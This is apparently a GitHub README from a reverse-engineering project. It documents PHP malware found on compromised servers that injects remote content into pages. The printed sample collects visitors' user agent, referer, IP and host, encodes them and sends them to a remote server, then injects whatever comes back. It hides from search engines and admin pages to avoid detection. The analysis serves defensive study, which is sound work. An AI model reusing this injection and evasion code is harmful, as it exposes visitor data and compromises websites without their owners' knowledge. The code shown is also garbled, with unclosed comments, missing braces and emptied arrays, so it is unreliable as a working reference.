No description, website, or topics provided.
Latest commit 297a109 Mar 2, 2016 @fititnt fititnt Better documentation

Reverse Engineering PHP Malware Content injection

This repository is a result of a Reverse Engineering of PHP Malware that makes Content injection.

The full description can be found in english in (@todo add link here) and in portuguese in (@todo add link here)

Authors of this work (re rev.eng., not the malware):

  • Bernardo Donadio bcdonadio at
  • Emerson Rocha Luiz emerson at

Sample code

/** REVENGNOTE: Do not assume that this malware will have same function names.
 *              even for the same malware.
function day212()
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");

    /** REVENGNOTE: this next array does nothing here. But was on original code.
     *    ,, and
     *              are domains that point (now) for the same working server
     *              they are used to create content to inject on user code
    $domarr = array(

    /** REVENGNOTE: this is very important. It does NOT inject content on site
     *              if is a search engine (that could alert site admin of this
     *              malware, and also does not load on pages that are like
     *              for administratior interfaces. It also check for a valid
     *              HTTP_REFERER, so sometimes, share a link with a friend will
     *              not work at all, because you need navitate on the site before
     *              Is very likely that most common antivirus agents will maybe
     *              pass this basic check, but remote server will know they
     *              user agent and will return empty content.
    if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
    )) . "/i", strtolower($a)))) {
        $o1 = "";
    else {
        $op = mt_rand(100000, 999999);
        $g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
        $url = "http://" . cqq(".com") . "/" . $g4;
        $ca1 = en2(@gtd($url) , $op);
        $a1 = @explode("!NF0", $ca1);
        if (sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";

    return $o1;


This is a reverse-engineering of malicious code found in compromised servers. The use of this code without explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use except for educational purposes.